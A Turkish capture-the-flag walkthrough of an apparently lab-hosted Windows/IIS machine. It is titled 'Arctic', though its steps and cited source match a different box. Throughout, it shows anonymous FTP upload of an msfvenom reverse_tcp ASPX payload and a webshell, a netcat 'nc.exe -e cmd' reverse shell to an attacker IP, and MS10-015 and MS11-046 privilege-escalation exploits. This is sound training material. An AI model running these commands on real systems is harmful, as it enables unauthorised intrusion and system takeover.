Arctic sanal makinesinin IP ve işletim sistemi bilgileri aşağıdaki gibidir.
- IP Adresi: 10.10.10.5
- İşletim Sistemi: Windows
A) Port Tarama
Port taraması sonucunda 2 adet portun açık olduğu tespit edilmiştir.
nmap -sS -sC -sV -vv -p- -oA fulltcp –open 10.10.10.5
Açık portlar aşağıdaki gibidir:
- 21/tcp
- 80/tcp
B) FTP Servisinin İncelenmesi
TCP\21 portunda FTP servisinin anonim olarak çalıştığı görülmektedir.
ftp 10.10.10.5
get iisstart.htm
İndirilen iisstart.htm sayfasının standart olduğu görülmektedir.
Benzer olarak welcome.png dosyası da indirilebilir.
ftp 10.10.10.5
binary
get welcome.png
İndirilen welcome.png resminin de standart olduğu görülmektedir.
Hedef sisteme anonymous FTP üzerinden erişim sağladıktan sonra okuma yetkimizin olduğunu ve içerisinde bulunan dosyaları HTTP üzerinden çağırabildiğimizi gözlemliyoruz. Burada tespit ettiğimiz durum şu şekildedir;
Bulunduğumuz dizindeki dosyaları tarayıcı üzerinden çalıştırabiliyoruz. Yani eğer yazma yetkimiz de mevcut ise, FTP üzerinden sisteme bir shell dosyası yükleyerek reverse shell elde edebilmemiz mümkün gözüküyor.
C) Zafiyetin Metasploit Framework ile İstismarı
Anonim FTP kullanılması ve anonim erişimlerde yazma yetkisinin bulunmasını istismar etmek için msfvenom aracı ile oluşturulan bir Shellcode kullanılabilir.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=3333 -f aspx > shell.aspx
Oluşturulan shell dosyası hedef sisteme FTP servisi üzerinden yüklenir.
ftp 10.10.10.5
ls -l
put shell.aspx
exit
Shell.aspx çağırıldığında ters bağlantı isteği elde edilecektir. Bu isteği yakalamak için MSF “exploit/multi/handler” modülü kullanılabilir.
use exploit/multi/handler
set LHOST 10.10.14.20
set LPORT 3333
exploit
Kali üzerinde dinleyici başlatıldıktan sonra, Shell.aspx dosyası tarayıcı üzerinden çağırılır.
Böylece ters bağlantı isteği yakalanmıştır.
exploit
D) MS10-015 Zafiyetinin İstismarı ile Yetki Yükseltme
IIS kullanıcısı ile Meterpreter erişimi elde edildikten sonra, MSF “post/multi/recon/local_exploit_suggester” modülü ile sistem üzerindeki açıklıklar tespit edilir.
use post/multi/recon/local_exploit_suggester
show options
set SESSION 3
show options
exploit
Tespit edilen açıklıklardan biri olan “MS10-015” Microsoft Windows güncelleştirme eksikliğine ait zafiyet MSF “windows/local/ms10_015_kitrap0d” modülü kullanılarak istismar edilebilir.
use windows/local/ms10_015_kitrap0d
set SESSION 3
show options
exploit
Başarılı bir istismar sonucunda sistem üzerinde “NT AUTHORITY\SYSTEM” haklarında erişim elde edilmiş olur.
getuid
sysinfo
ifconfig
“user.txt.txt” dosyası “babis” kullanıcısının masaüstünden alınabilir.
type user.txt.txt
ipconfig
“root.txt.txt” dosyası “Administrator” kullanıcısının masaüstünden alınabilir.
type root.txt.txt
ipconfig
E) Zafiyetin Manuel Olarak İstismarı
“B” başlığında yapılandırma zafiyeti Metasploit Framework’teki MsfVenom aracı kullanılarak hazırlanan aspx dosyası kullanılmış ve Meterpreter erişimi elde edilmişti. Bu başlıkta ise Kali üzerinde hazır olarak bulunan bir aspx dosyası kullanılacak ve standart komut satırı erişimi elde edilecektir.
Bu amaçla ilk olarak hedef sistem üzerine “cmd.aspx” shell dosyasını ve “netcat” istemcisini yüklüyoruz.
put /usr/share/webshells/aspx/cmdasp.aspx cmd.aspx
binary
put /usr/share/windows-binaries/nc.exe nc.exe
Tarayıcı üzerinden yüklediğimiz “cmd.aspx” shell dosyasını çağırıyoruz. Bu dosya komut enjeksiyonu zafiyetini barındırdığı için işletim sisteminde web kullanıcısı yetkisi ile komut çalıştırabiliriz.
“nc.exe” istemci dosyasının yerini “C:\inetpub\wwwroot” olarak tespit ediyoruz. Bu dosya Kali makinemize ters bağlantı erişimini sağlamak için kullanılacaktır.
dir /s/b C:\ | findstr /i “nc.exe”
Kali üzerinde ters bağlantıyı yakalayacak bir dinleyici başlatılır.
nc -lvp 5555
Hedef sunucuya yüklediğimiz “nc.exe” aracını kullanarak, hedef sistem üzerinden Kali dinleyicisine doğru ters bağlantı erişimi elde etmiş oluruz.
C:\inetpub\wwwroot\nc.exe -e cmd 10.10.14.20 5555
Elde edilen ters bağlantının web uygulama kullanıcı yetkisi ile olduğu görülmektedir.
F) MS11-046 Zafiyetinin İstismarı ile Yetki Yükseltme
IIS kullanıcısı ile standart komut satırı erişimi elde edildikten sonra, işletim sisteminin 32 bit mimaride “Microsoft Windows 7 Enterprise 6.1.7600 N/A Build 7600” olduğu tespit edilir.
Söz konusu işletim sisteminin versiyonuna ait açıklıkların Google arama motoru üzerinden listelendiğinde Exploit-Db üzerinde bir istismar kodunun olduğu görülmektedir.
Zafiyete ait istismar kodu komut satırı üzerinden “searchsploit” aracı ile elde edilebilir.
searchsploit MS11-046
searchsploit -p exploits/windows_x86/local/40564.c
cp /usr/share/exploitdb/exploits/windows_x86/40564.c .
Not: Bulunduğumuz dizine kopyalama işlemi için “-m” parametresi de kullanılabilir.
searchsploit -m 40564
İstismar kodu Kali üzerinde derlenip ve FTP üzerinden hedef sisteme yüklenmir.
i686-w64-mingw32-gcc 40564.c -o pe.exe -lws2_32
ls -l
ftp 10.10.10.5
binary
put pe.exe
Elde edilen ters bağlantı (standart komut satırı veya Meterpreter komut satırı) üzerinden “pe.exe” dosyasının çalıştırıldığında NT AUTHORITY\SYSTEM yetkisinin elde edildiği görülmektedir.
dir C:\ /s/b | find /i “pe.exe”
C:\inetpub\wwwroot\pe.exe
“user.txt” ve “root.txt” dosyaları elde edilmiş olur.
Kaynaklar:
https://pentestworld.blogspot.com/2019/06/hack-box-devel.html